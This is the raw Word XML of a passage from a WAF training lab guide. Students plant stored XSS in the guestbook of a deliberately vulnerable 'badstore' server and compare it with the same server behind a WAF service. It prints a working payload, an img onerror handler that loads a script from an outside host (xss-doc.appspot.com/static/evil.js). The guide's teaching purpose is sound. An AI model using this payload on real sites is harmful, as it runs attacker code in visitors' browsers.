    <w:p w14:paraId="4BA2D587" w14:textId="623D6A58" w:rsidR="007045EA" w:rsidRDefault="00DD0E51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">You will see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> blocks it, a</w:t>
      </w:r>
      <w:r w:rsidR="000E572F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">nd this XSS never makes it to the application, it is blocked right at the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E572F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E572F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007045EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC2A8F1" w14:textId="40136D9C" w:rsidR="00B35D5D" w:rsidRDefault="000E572F" w:rsidP="00DD0E51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:r w:rsidR="00A34C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">to see this </w:t>
      </w:r>
      <w:r w:rsidR="007045EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidR="00A34C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>on the vulnerable server</w:t>
      </w:r>
      <w:r w:rsidR="007045EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B30C472" w14:textId="77777777" w:rsidR="00B35D5D" w:rsidRDefault="00B35D5D" w:rsidP="00DD0E51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00637DDF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>http://badstore&lt;student</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> number</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>&gt;..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>cudathon.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E6C33" w14:textId="520B674F" w:rsidR="00B35D5D" w:rsidRDefault="00B35D5D" w:rsidP="007045EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on Sign </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Guestbook, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007045EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>do the same XSS as before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3633FD01" w14:textId="5EB824F3" w:rsidR="000E572F" w:rsidRDefault="000E572F" w:rsidP="001E79D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">If everything goes well, you will see this: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A3732F" w14:textId="50285439" w:rsidR="001E79D3" w:rsidRDefault="008E239E" w:rsidP="001E79D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FA456EE" wp14:editId="6BA75395">
            <wp:extent cx="4997450" cy="79820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668" cy="811815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEAD71C" w14:textId="647FFE1E" w:rsidR="008E239E" w:rsidRDefault="008E239E" w:rsidP="001E79D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">So that’s not very exciting, but </w:t>
      </w:r>
      <w:r w:rsidR="00B837DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">it is a type of stored XSS, advertising fraud type attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A34C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>( call</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A34C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> it what you will ) </w:t>
      </w:r>
      <w:r w:rsidR="00B837DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">everyone who leaves a comment is going to see that.  Try going back and leaving another comment, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>you’ll</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> see what we mean</w:t>
      </w:r>
      <w:r w:rsidR="00A34C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, you will see that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A34C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Terriblestore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A34C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> advertising pop-up again. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64904668" w14:textId="77777777" w:rsidR="007045EA" w:rsidRDefault="007045EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1336ED0C" w14:textId="6925A74E" w:rsidR="007045EA" w:rsidRDefault="00193CCF" w:rsidP="001E79D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00061193">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00061193">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A87A1A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>let’s make it way more fun</w:t>
      </w:r>
      <w:r w:rsidR="0044252F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and do a real hack</w:t>
      </w:r>
      <w:r w:rsidR="00A87A1A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">! </w:t>
      </w:r>
      <w:r w:rsidR="007045EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE26A38" w14:textId="77777777" w:rsidR="007045EA" w:rsidRDefault="00061193" w:rsidP="001E79D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> CNAME </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A44B5" w14:textId="1F38D620" w:rsidR="00C17254" w:rsidRDefault="007045EA" w:rsidP="00061193">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="0044252F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">lick on Sign Guestbook </w:t>
      </w:r>
      <w:r w:rsidR="00061193">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">and leave a comment as before, but this time put this as the comment text.  By the way, you will see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00061193">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00061193">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> blocks this</w:t>
      </w:r>
      <w:r w:rsidR="00C17254">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C17254">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">I highly recommend </w:t>
      </w:r>
      <w:r w:rsidR="00B02C63">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00C17254">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>copy and paste</w:t>
      </w:r>
      <w:r w:rsidR="00B02C63">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> for this one</w:t>
      </w:r>
      <w:r w:rsidR="00C17254">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, just remember to fix up any quotes that get mangled due to font and pasting quirks between screens and browsers.  </w:t>
      </w:r>
      <w:r w:rsidR="00B02C63">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Double quotes and single quotes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B02C63">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B02C63">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> be the straight up-and-down ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BED81B" w14:textId="7ECBBD4E" w:rsidR="00061193" w:rsidRPr="009C7DBD" w:rsidRDefault="00061193" w:rsidP="00061193">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C7DBD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7DBD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7DBD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7DBD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7DBD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>=1 onerror="s=document.createElement('script');s.src='</w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidRPr="009C7DBD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009C7DBD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE5976B" w14:textId="77777777" w:rsidR="007045EA" w:rsidRDefault="007045EA" w:rsidP="001E79D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>So that gets blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6326A90E" w14:textId="5F631022" w:rsidR="007045EA" w:rsidRDefault="007045EA" w:rsidP="001E79D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Now go to </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00193CCF" w:rsidRPr="00637DDF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>http://badstore&lt;student</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00193CCF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> number</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00193CCF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>&gt;.cudathon.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00193CCF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and try the same </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">thing.  </w:t>
      </w:r>
      <w:r w:rsidR="005F3A21">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">You should get a real shock! </w:t>
      </w:r>
      <w:r w:rsidR="005F3A21" w:rsidRPr="00B02C63">
        <w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="w16se">
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibr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5F3A21">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Better stay away from that comments page until the app developers have cleaned it all up. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F6E04" w14:textId="3D8A22E2" w:rsidR="004A3C9E" w:rsidRDefault="0044252F" w:rsidP="001E79D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D5C0E28" wp14:editId="720D6979">
            <wp:extent cx="3650914" cy="21336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3922" cy="2152890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F60801" w14:textId="77777777" w:rsidR="005F3A21" w:rsidRDefault="005F3A21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3950A76D" w14:textId="15ED7033" w:rsidR="00F90E1A" w:rsidRDefault="00F90E1A" w:rsidP="00F90E1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Beyond the OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B649BE8" w14:textId="666BF2FD" w:rsidR="00F63ABA" w:rsidRDefault="0045382E">
      <w:r>
        <w:t>Well b</w:t>
      </w:r>
      <w:r w:rsidR="00F63ABA">
        <w:t xml:space="preserve">elieve it or not, </w:t>
      </w:r>
      <w:r w:rsidR="005F3A21">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00F96BE0">
        <w:t xml:space="preserve">pplication security </w:t>
      </w:r>
      <w:r w:rsidR="00F90E1A">
        <w:t xml:space="preserve">goes </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:t xml:space="preserve">much </w:t>
      </w:r>
      <w:r w:rsidR="00F90E1A">
        <w:t xml:space="preserve">further </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:t xml:space="preserve">than </w:t>
      </w:r>
      <w:r w:rsidR="00F63ABA">
        <w:t xml:space="preserve">SQL Injection and XSS and the </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r w:rsidR="00F63ABA">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD420C" w14:textId="7D1C6628" w:rsidR="0000459B" w:rsidRDefault="00F63ABA">
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="00F96BE0">
        <w:t xml:space="preserve">ou </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F96BE0">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F96BE0">
        <w:t xml:space="preserve"> defend against </w:t>
      </w:r>
      <w:r w:rsidR="0000459B">
        <w:t>Bot</w:t>
      </w:r>
      <w:r w:rsidR="00F96BE0">
        <w:t xml:space="preserve"> attacks, block </w:t>
      </w:r>
      <w:r w:rsidR="0000459B">
        <w:t>Account Take Ove</w:t>
      </w:r>
      <w:r w:rsidR="00F96BE0">
        <w:t>rs</w:t>
      </w:r>
